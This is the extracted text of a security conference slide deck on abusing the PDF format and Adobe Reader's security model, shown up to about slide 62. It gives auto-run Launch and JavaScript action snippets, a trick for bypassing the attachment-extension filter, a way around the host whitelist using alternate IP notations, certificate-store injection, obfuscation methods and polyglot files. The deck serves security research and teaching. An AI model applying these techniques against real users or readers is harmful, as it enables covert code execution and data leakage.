PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last

words

Malicious origami in PDF

Sogeti-Cap Gemini MISC magazine fred(at)security-labs.org frederic.raynal(at)sogeti.com

Frdric Raynal e e

Sogeti-Cap Gemini guillaume(at)security-labs.org guillaume.delugre(at)sogeti.com

Guillaume Delugr e

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

1/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

PDF

MS Oce documents are regarded as lethal:

Many arbitrary code execution aws, macro-virus, . . .

PDF les are much more reliable and secure!!!

No macro Documents are static like images

Feeling secure with PDF?

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

2/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Origami
Denition (Wikipedia) From oru meaning folding, and kami meaning paper. Ancient Japanese art of paper folding. The goal is to create a representation of an object using geometric folds and crease patterns preferably without the use of gluing or cutting the paper, and using only one piece of paper. Origami only uses a small number of dierent folds, but they can be combined in a variety of ways to make intricate designs.

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

3/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

About this talk

The philosophy of malicious origami in PDF Understand the PDF language to (ab)use it Understand the security model enforced by PDF readers Using PDF against PDF Con: Longer to do than nding a 0-day in most PDF readers
Quick to nd, quick to patch

Pro: Attacks based on design aws are the most ecient

Long to nd, long (if not impossible) to patch

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

4/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Structure of a PDF le Thinking PDF Deep inside PDF: objects

Roadmap
1

PDF 101 Structure of a PDF le Thinking PDF Deep inside PDF: objects The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

5/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Structure of a PDF le Thinking PDF Deep inside PDF: objects

A brief history of PDF (in a single slide)

1991 PDF 1.0: rst release 1994 PDF 1.1: links, encryption, comments 1996 PDF 1.2: forms, audio/video, annotations 1999 PDF 1.3: JavaScript, attachments, signatures 2001 PDF 1.4: transparency, encryption enhancement 2003 PDF 1.5: layers 2005 PDF 1.6: 3D engine 2007 PDF 1.7: Flash integration, 3D enhancement

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

6/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Structure of a PDF le Thinking PDF Deep inside PDF: objects

Roadmap
1

PDF 101 Structure of a PDF le Thinking PDF Deep inside PDF: objects The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

7/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Structure of a PDF le Thinking PDF Deep inside PDF: objects

Textual overview: what is PDF?

PDF is a le format Documents are described as a collection of objects These objects are stored in a le This le is read by a renderer in order to display the data PDF is a descriptive language Interaction between objects Interaction with the renderer (password protection, printing, . . . ) No control statement (if, while, . . . )

What you see is not what you get

F. Raynal & G. Delugr (Sogeti/ESEC) e Malicious origami in PDF

8/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Structure of a PDF le Thinking PDF Deep inside PDF: objects

Graphical overview
File
Header Object Object

Object Object Cross Ref.

Trailer
F. Raynal & G. Delugr (Sogeti/ESEC) e Malicious origami in PDF

9/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Structure of a PDF le Thinking PDF Deep inside PDF: objects

PDF header
File
Header Object Object %PDF-1.1

Object Object Cross Ref.

Keyword %PDF PDF version (from 1.0 to 1.7) Optional binary sequence 25 e2 e3 cf d3
Google it and own the Internet

Trailer
F. Raynal & G. Delugr (Sogeti/ESEC) e Malicious origami in PDF 10/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Structure of a PDF le Thinking PDF Deep inside PDF: objects

PDF objects
File
Header Object Object 1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj

Object Object Cross Ref.

42 0 obj << /Name /F1 /BaseFont /Helvetica /Type /Font >> endobj

Trailer
F. Raynal & G. Delugr (Sogeti/ESEC) e Malicious origami in PDF 11/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Structure of a PDF le Thinking PDF Deep inside PDF: objects

PDF cross references (1/2)

File
Header Object Object 1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj

Object Object Cross Ref. xref 0 6 0000000000 0000000010 0000000228 0000000296 0000000449 0000002437 65535 00000 00000 00000 00000 00000 f n n n n n
12/116

Trailer

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Structure of a PDF le Thinking PDF Deep inside PDF: objects

PDF cross references (2/2)

Section start Number of objects

First object Objects in use

xref 0 6 0000000000 0000000010 0000000228 0000000296 0000000449 0000002437

65535 00000 00000 00000 00000 00000

f n n n n n

Free object

Offsets in le

Object generation

Object in use: <offset> <generation> n

<offset>: bytes since the beginning of the le to the objects denition

Free object : 0000000000 <number> f

<number>: number of the next free object
F. Raynal & G. Delugr (Sogeti/ESEC) e Malicious origami in PDF 13/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Structure of a PDF le Thinking PDF Deep inside PDF: objects

PDF trailer (1/2)

File
Header Object Object

Object Object Cross Ref. trailer << /Size 6 /Root 1 0 R >> startxref 2991 %%EOF
Malicious origami in PDF 14/116

Trailer

F. Raynal & G. Delugr (Sogeti/ESEC) e

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Structure of a PDF le Thinking PDF Deep inside PDF: objects

PDF trailer (2/2)

Section start Number of elt in xref Optional information

trailer << /Size 6 /Root 1 0 R /Author Paul >> startxref 2991 %%EOF

Root object (Catalog) xref location

Provide all the needed information to read the PDF le Catalog is the root object describing the content of the le

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

15/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Structure of a PDF le Thinking PDF Deep inside PDF: objects

Roadmap
1

PDF 101 Structure of a PDF le Thinking PDF Deep inside PDF: objects The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

16/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Structure of a PDF le Thinking PDF Deep inside PDF: objects

Understanding PDF
Based on 4 parts Objects: basic element contained in the document File structure: how objects are stored in a le
Header, body, xref, trailer Encryption, signature, . . .

Document structure: how to use the objects to display the content of a le

Page, chapter, annotation, fonts, . . .

Content streams: sequence of instructions describing the appearance of a page or other graphical entity

Everything is described as an object

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

17/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Structure of a PDF le Thinking PDF Deep inside PDF: objects

Physical view
1 0 obj << /Type /Catalog /Pages 2 0 R >> 2 0 obj << /Count 2 /Kids [3 0 R 6 0 R] /Type /Pages >> 3 0 obj << /Resources << /Font << /F1 5 0 R >> >> /MediaBox [0 0 795 842] /Parent 2 0 R /Contents 4 0 R /Type /Page >> 4 0 obj << /Length 53 >> stream BT 1 Tr /F1 30 Tf 350 750 Td (foobar) Tj ET endstream 5 0 obj << /Name /F1 /BaseFont /Helvetica /Type /Font >> 6 0 obj << /Resources << /Font << /F1 5 0 R >> >> /MediaBox [0 0 795 842] /Parent 2 0 R /Contents 4 0 R /Type /Page >>

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

18/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Structure of a PDF le Thinking PDF Deep inside PDF: objects

Logical view
1 0 obj << /Type /Catalog /Pages 2 0 R >>

2 0 obj << /Count 2 /Kids [3 0 R 6 0 R] /Type /Pages >>

3 0 obj << /Resources << /Font << /F1 5 0 R >> >> /MediaBox [0 0 795 842] /Parent 2 0 R /Contents 4 0 R /Type /Page >>

6 0 obj << /Resources << /Font << /F1 5 0 R >> >> /MediaBox [0 0 795 842] /Parent 2 0 R /Contents 4 0 R /Type /Page >>

4 0 obj << /Length 53 >> stream BT 1 Tr /F1 30 Tf 350 750 Td (foobar) Tj ET endstream

5 0 obj << /Name /F1 /BaseFont /Helvetica /Type /Font >>

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

19/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Structure of a PDF le Thinking PDF Deep inside PDF: objects

Roadmap
1

PDF 101 Structure of a PDF le Thinking PDF Deep inside PDF: objects The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

20/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Structure of a PDF le Thinking PDF Deep inside PDF: objects

Object denition
Reference number Generation number

Keywords specic to each type of object

1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj Reference to another object

Object delimiter

Always start by a reference number, then a generation Denition of the object surrounded by obj << ... >> endobj Keywords inside the object depends on its type Keywords can use reference to other objects List of objects often referred as body
F. Raynal & G. Delugr (Sogeti/ESEC) e Malicious origami in PDF 21/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Structure of a PDF le Thinking PDF Deep inside PDF: objects

Basic types
Null object Integer, real: straightforward Boolean: true, false String: multiple encodings available
(This is a string in PDF)

Name: used as reference to another object instead of its number

/SomethingElse

Array: mono-dimensional sequence of objects/references

[ (foo) 42 0 R 3.14 null ]

Dictionary: (key, value) pairs

<< k0 v0 k1 v1 . . . kn vn >> Most objects are dictionaries

Stream: association of a dictionary and raw data to be processed

4 0 obj << /Length 53 >> stream BT 1 Tr /F1 30 Tf 350 750 Td (foobar) Tj endstream endobj
F. Raynal & G. Delugr (Sogeti/ESEC) e

ET

Malicious origami in PDF

23/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Structure of a PDF le Thinking PDF Deep inside PDF: objects

Focus on stream

Type

Transformation Filter Parameters

Raw data to be ltered

40 0 obj << /Subtype/Image /ColorSpace/DeviceRGB /Width 103 /Height 104 /BitsPerComponent 8 /Filter/FlateDecode /DecodeParms << /Predictor 15 /Columns 103 /Colors 3 >> /Length 3259 >> stream ... endstream endobj

/Subtype: kind of stream /Filter: transformation to apply to the data

2 main categories: ASCII, decompression Can be cascaded: [ /ASCII85Decode /LZWDecode ]

/DecodeParms : optional parameters depending on the lter

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

25/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Structure of a PDF le Thinking PDF Deep inside PDF: objects

Advanced objects
A very descriptive language General: page tree nodes, pages, names, dates, text streams, functions, le specications, . . . Graphics: path construction operators, clipping, external objects (XObject), images, patterns, . . . Text: spacing, text rendering, text positioning, fonts, . . . Rendering: color device, gamma correction, halftones, . . . Transparency: shape, opacity, color mask, alpha factor, . . . Interactive: viewer preference, annotation, actions, forms, digital signature, . . . Multimedia: play/screen parameters, sounds, movies, 3D artwork, . . .

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

26/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Enforced security User congurable security Signature and certication Usage rights

Roadmap
1

PDF 101 The PDF way of security Enforced security User congurable security Signature and certication Usage rights Thinking malicious PDF Darth Origami: dark side of PDF Last words
Malicious origami in PDF 27/116

F. Raynal & G. Delugr (Sogeti/ESEC) e

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Enforced security User congurable security Signature and certication Usage rights

Security philosophy with PDF

They never learn. . . Some features are really dangerous . . .

Ex.: starting external programs, JavaScript, automatic / invisible actions, . . .

But guys know they are dangerous, so they restrict them. . .

Blacklist approach: allow everything which is not explicitly forbidden

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

28/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Enforced security User congurable security Signature and certication Usage rights

Security philosophy with PDF

They never learn. . . Some features are really dangerous . . .

Ex.: starting external programs, JavaScript, automatic / invisible actions, . . .

But guys know they are dangerous, so they restrict them. . .

Blacklist approach: allow everything which is not explicitly forbidden

Which is opposite to the most important security mantra:

Forbid everything which is not explicitly allowed!!!

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

28/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Enforced security User congurable security Signature and certication Usage rights

Focus: Adobe Reader

Summary in a single slide Some features are restricted in the software
Restricted JavaScript interpreter Blacklist for some le extensions, web sites, . . .

Security can be congured at user level:

Windows: key HKCU\Software\Adobe\Acrobat Reader Windows: directory %APPDATA%\Adobe\Acrobat Unix: directory ~/.adobe/Acrobat/ Mac OS X: directory ~/Library/Preferences/com.adobe.*

Notion of trusted documents

Signature: digitally signed documents embedding signers certicate Certication: documents signed by a trusted entity, enforcing modication prevention

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

29/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Enforced security User congurable security Signature and certication Usage rights

Roadmap
1

PDF 101 The PDF way of security Enforced security User congurable security Signature and certication Usage rights Thinking malicious PDF Darth Origami: dark side of PDF Last words
Malicious origami in PDF 30/116

F. Raynal & G. Delugr (Sogeti/ESEC) e

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Enforced security User congurable security Signature and certication Usage rights

Actions: when PDF becomes dynamic

List of actions GoTo*: change the view to the specied destination Launch: start a command Thread: jump to a bead in an article URI: resolve and connect to a given URI Sound: play a sound Movie: play a movie Hide: manipulate annotations to hide/display them Named: predened actions to move across a doc Set-OCG-Stage: handle optional contents Rendition: control the playing of multimedia content Transition: handle the drawing between actions Go-To-3D: identies a 3D annotations and its viewing JavaScript: run a JS script

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

31/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Enforced security User congurable security Signature and certication Usage rights

Actions
When PDF becomes dynamic: OpenAction & trigger events Event Document or page is open Page is viewed Mouse enters/exits a zone Mouse button is pressed/released ... Action Run a command or a JavaScript Jump to a destination Play a sound/movie Submit a form to a URL ...

Actions usually raised an alert box Most alerts can be disabled in the conguration Security ensured most of the time through a warning pop-up

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

32/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Enforced security User congurable security Signature and certication Usage rights

Action in practice: Launch (a.k.a. invisible printing)

(Almost) Invisible printing: document leaking
/OpenAction << /S /Launch /Win << /O (print) /F (C:\\test.pdf) >> >>

Adobe Reader 9 asks to start Adobe Reader 9 (!!!) If user clicks Open, document is silently printed, no other message Launch does not refer to extension lter
F. Raynal & G. Delugr (Sogeti/ESEC) e Malicious origami in PDF 34/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Enforced security User congurable security Signature and certication Usage rights

JavaScript
JavaScript for Adobe Modied open source SpiderMonkeya engine, dening two execution contexts
Non-privileged context (default): scripts are limited to handle forms and document properties Privileged context: scripts are allowed to call more powerful (and sensible) methods, such as HTTP requests

Two ways of executing JavaScript:

Embedding the script in the PDF document Having a script in the user conguration folder
These scripts are executed each time a PDF document is open Located in <config folder>/JavaScripts/*.js They run in a privileged context
a Adobes site claims changes will be made public, according to the Mozilla license. . . since 3 years!!!

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

35/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Enforced security User congurable security Signature and certication Usage rights

JavaScript in practice
Embedding a JavaScript
/OpenAction << /S /JavaScript /JS (app.alert("run me automatically")) >>

JavaScript exceptions will not raise any alert if enclosed in a try/catch statement
F. Raynal & G. Delugr (Sogeti/ESEC) e Malicious origami in PDF 36/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Enforced security User congurable security Signature and certication Usage rights

Roadmap
1

PDF 101 The PDF way of security Enforced security User congurable security Signature and certication Usage rights Thinking malicious PDF Darth Origami: dark side of PDF Last words
Malicious origami in PDF 37/116

F. Raynal & G. Delugr (Sogeti/ESEC) e

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Enforced security User congurable security Signature and certication Usage rights

Where the conguration resides

Most of the conguration is stored in user folders. Folders and keys On Windows
HKCU\Software\Adobe\Acrobat Reader HKLM\SOFTWARE\Policies\Adobe\Acrobat Reader\9.0\FeatureLockDown %APPDATA%\Adobe\Acrobat

On Unix: ~/.adobe/Acrobat Mac OS X: ~/Library/Preferences/com.adobe.* Some important les Main le: <folder>/Preferences/reader prefs (on Unix) Start-up scripts: <folder>/JavaScripts/*.js Certicates: <folder>/Security/*.acrodata
F. Raynal & G. Delugr (Sogeti/ESEC) e Malicious origami in PDF 38/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Enforced security User congurable security Signature and certication Usage rights

Filtering attachments: the theory

Adobe Reader anti-virus Security policy for extracting attachments based on le extension ltering A default non-writable blacklist prohibits various extensions : cmd, bat, js, vbs, exe, pif, com ...
This blacklist is stored in HKLM or in the installation folder, hence not modiable PDF and FDF are whitelisted by default

User can dene his own extensions whitelist

whitelisted extensions can then run without any warning, whatever the le is really containing Blacklist has precedence over whitelist

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

39/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Enforced security User congurable security Signature and certication Usage rights

Filtering attachments: the real life

Adobe Reader anti-virus Reader prompts user to open this attachment

Bypassing attachment lter Adobe Reader 8: jar les are allowed by default Adobe Reader 9: bypass ltering by adding : or \ at the end of the lename (MS Windows)
F. Raynal & G. Delugr (Sogeti/ESEC) e Malicious origami in PDF 40/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Enforced security User congurable security Signature and certication Usage rights

Filtering attachments: the real life

Adobe Reader anti-virus Reader prompts user to open this attachment

Bypassing attachment lter Adobe Reader 8: jar les are allowed by default Adobe Reader 9: bypass ltering by adding : or \ at the end of the lename (MS Windows)
F. Raynal & G. Delugr (Sogeti/ESEC) e Malicious origami in PDF 40/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Enforced security User congurable security Signature and certication Usage rights

Filtering Internet Access: the theory

Adobe Reader proxy Form submission, or URL access may require Readers approbation Access checking is only based on the hostname User can allow access to any sites, forbid everything, or deal with it case by case with a pop-up Access list can be modied at user level through registry or user folder
Once a site is whitelisted, no pop-up will be raised during future connection attempts

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

41/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Enforced security User congurable security Signature and certication Usage rights

Filtering Internet Access: the real life

Adobe Reader proxy Reader prompts user to allow connection as this site has no access entry

Bypassing the blacklisting of PDF proxy Filtering based on pattern matching: nd another representation! http://seclabs.org == http://88.191.33.37 == http://1488920869:80/
F. Raynal & G. Delugr (Sogeti/ESEC) e Malicious origami in PDF 42/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Enforced security User congurable security Signature and certication Usage rights

Filtering Internet Access: the real life

Adobe Reader proxy Reader prompts user to allow connection as this site has no access entry

Bypassing the blacklisting of PDF proxy Filtering based on pattern matching: nd another representation! http://seclabs.org == http://88.191.33.37 == http://1488920869:80/
F. Raynal & G. Delugr (Sogeti/ESEC) e Malicious origami in PDF 42/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Enforced security User congurable security Signature and certication Usage rights

Filtering protocols: the theory

Adobe Reader rewall Protocols are ltered based on schemas:

Ex.: http, ssh, rlogin, telnet, file, ...

A blacklist is dened in HKLM\SOFTWARE\Policies\Adobe\Acrobat Reader\9.0\FeatureLockDown\cDefaultLaunchURLPerms No option in the GUI or user conguration le to change that But a user can add its own option manually in HKCU
If http:// is added to the whitelist, no more warning is ever prompted when a HTTP connection is made!

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

43/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Enforced security User congurable security Signature and certication Usage rights

Filtering protocols: the real life

Adobe Reader rewall Reader prompts user to connect to a chrome address (Mozilla XUL interface).

Bypassing the blacklisting of PDF proxy Whitelisted schemes have precedence over blacklisted hostnames! Short-circuit the security conguration of the GUI
F. Raynal & G. Delugr (Sogeti/ESEC) e Malicious origami in PDF 44/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Enforced security User congurable security Signature and certication Usage rights

Filtering protocols: the real life

Adobe Reader rewall Reader prompts user to connect to a chrome address (Mozilla XUL interface).

Bypassing the blacklisting of PDF proxy Whitelisted schemes have precedence over blacklisted hostnames! Short-circuit the security conguration of the GUI
F. Raynal & G. Delugr (Sogeti/ESEC) e Malicious origami in PDF 44/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Enforced security User congurable security Signature and certication Usage rights

Roadmap
1

PDF 101 The PDF way of security Enforced security User congurable security Signature and certication Usage rights Thinking malicious PDF Darth Origami: dark side of PDF Last words
Malicious origami in PDF 45/116

F. Raynal & G. Delugr (Sogeti/ESEC) e

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Enforced security User congurable security Signature and certication Usage rights

Signed PDF

PDF Digital signature howto A PDF document can be digitally signed The whole document has to be signed for the signature to be accepted Embedding a x509 certicate or PKCS7 envelop, with the document signature The signature is validated by the reader at the opening

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

46/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Enforced security User congurable security Signature and certication Usage rights

Inside Digital Signature

DigSig Howto Filter and SubFilter dene the signature scheme Contents contains the signature itself ByteRange species what part of the le is signed
Must include everything but Contents, from start to end of the le
File
Header Object Signature 2 0 obj << /Type /Sig /SubFilter /adbe.pkcs7.detached /Contents <...> /ByteRange [ 0 660 4818 1050 ] >> endobj

Object Object Cross Ref.

Trailer

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

47/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Enforced security User congurable security Signature and certication Usage rights

More trust with PDF certication

Certication A signed document can be passed into another digest signature process leading to a certied document Dierent trusting properties can be set to certied documents Properties: can have dynamic content, can execute privileged JavaScript, . . . Adobe Reader store User-trusted (and CA root) certicates are saved in the Adobe certicate store This store is a le located in the user conguration folders Security policy is dened at the user level !!!

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

48/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Enforced security User congurable security Signature and certication Usage rights

Certicate storage
Adobe Reader store le format Localization: <conf folder>/Security/addressbook.acrodata As it is user-writable, one could inject a malicious certicate! Structure very close to PDF : header, body with objects, xref, trailer Each certicate stored in a dictionary object
<< /ABEType 1 /Cert(...) /ID 1001 /Editable false /Viewable false /Trust 8190 >> # # # # # # 1 stands for a certificate DER-encoded certificate string Unique value used to reference this certificate Appears in the GUI panel Can be edited in the GUI panel Rights to give to certified documents

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

50/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Enforced security User congurable security Signature and certication Usage rights

Roadmap
1

PDF 101 The PDF way of security Enforced security User congurable security Signature and certication Usage rights Thinking malicious PDF Darth Origami: dark side of PDF Last words
Malicious origami in PDF 51/116

F. Raynal & G. Delugr (Sogeti/ESEC) e

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Enforced security User congurable security Signature and certication Usage rights

Usage rights

What are they? Usage rights are used to enable additional interactive features that are not available by default in a particular viewer application (such as Adobe Reader). The document must be signed Annots: Create, Delete, Modify, Copy, Import, Export
Online: upload or download markup annotations from a server

Form: Fillin (save), Import, Export, SubmitStandalone

Online: permits the use of forms-specic online mechanisms such as SOAP or Active Data Object

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

52/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Enforced security User congurable security Signature and certication Usage rights

Gaining usage rights

How to get them the Adobe way? Usage rights are granted by Adobe Pro and so on (Adobes non free softwares) Documents with usage rights must be certed by Adobe Adobes certicate is provided in the certicate storage Exercise: where can be Adobes private key to sign the documents?

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

53/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Evasion tricks Denial of Service Information leakage Dropping eggs Code execution

Roadmap
1

PDF 101 The PDF way of security Thinking malicious PDF Evasion tricks Denial of Service Information leakage Dropping eggs Code execution Darth Origami: dark side of PDF Last words
Malicious origami in PDF 54/116

F. Raynal & G. Delugr (Sogeti/ESEC) e

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Evasion tricks Denial of Service Information leakage Dropping eggs Code execution

Thinking malicious PDF

Thinking like an attacker I want to be invisible evasion tricks I want to kill PDF les and/or Reader denial of services I want to steal information (read + send) information leakage I want to corrupt my target egg dropping I want to overrun the target code execution

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

55/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Evasion tricks Denial of Service Information leakage Dropping eggs Code execution

Roadmap
1

PDF 101 The PDF way of security Thinking malicious PDF Evasion tricks Denial of Service Information leakage Dropping eggs Code execution Darth Origami: dark side of PDF Last words
Malicious origami in PDF 56/116

F. Raynal & G. Delugr (Sogeti/ESEC) e

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Evasion tricks Denial of Service Information leakage Dropping eggs Code execution

Encryption with PDF

Data protection Uses RC4 or AES symmetric algorithms Only strings and stream objects are encrypted Other objects are considered as part of le structure, not document contents Prompts for the user key in order to read the original document

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

57/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Evasion tricks Denial of Service Information leakage Dropping eggs Code execution

Natural polymorphism with PDF

Obfuscating a PDF le Strings (thus keyword) can be encoded in many way Objects can appear in the le in any order Objects can be splitted in many objects referring to each other Streams can be compressed with many cascaded algorithms Strings can be written in dierent ways : ASCII, octal, hexadecimal, and in dierent charsets PDF objects can be embedded into a compressed stream object A PDF le can be splitted into many les referring to each other A PDF le can be embedded into another PDF le

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

58/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Evasion tricks Denial of Service Information leakage Dropping eggs Code execution

Semantic Polymorphism: many to one

Trigger an action when a PDF is opened OpenAction: put in the PDF catalog Register an Additional Action AA on the rst page Register an Additional Action AA on page n, set the 1st displayed page to be this one Using Requirement Handlers RH, checks are based on a JavaScript when the PDF is opened ...

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

59/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Evasion tricks Denial of Service Information leakage Dropping eggs Code execution

Whats this le? PDF? JPG? . . .

Double view: PDF in JPG JPG header built with sections Each section starts with 0xFF 0xXX, where byte XX tells the kind of the section You can put comments in JPG les: section 0xFF 0xFE

SOI JFIF

FF D8 FF EO XX XX .... XX

Other JPG sections

Comment

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

60/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Evasion tricks Denial of Service Information leakage Dropping eggs Code execution

Whats this le? PDF? JPG? . . .

SOI

FF D8

JFIF

FF EO XX XX .... XX

Other JPG sections

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

60/116

Double view: PDF in JPG JPG header built with sections Each section starts with 0xFF 0xXX, where byte XX tells the kind of the section You can put comments in JPG les: section 0xFF 0xFE

Comment

FF FE XX XX ... ...

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Evasion tricks Denial of Service Information leakage Dropping eggs Code execution

Whats this le? PDF? COM?. . .

Double view: PDF in COM COM (DOS 16-bits executable) has no header Contains raw code executed from rst byte Entry point jumps around PDF code

pdf.asm
.model t i n y .code .startup jmp s t a r t p d f f i l e db " \% PDF -1 .1 " , 1 3 , 1 0 , . . . s t a r t : <i n s t r u c t i o n s > ... end

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

62/116

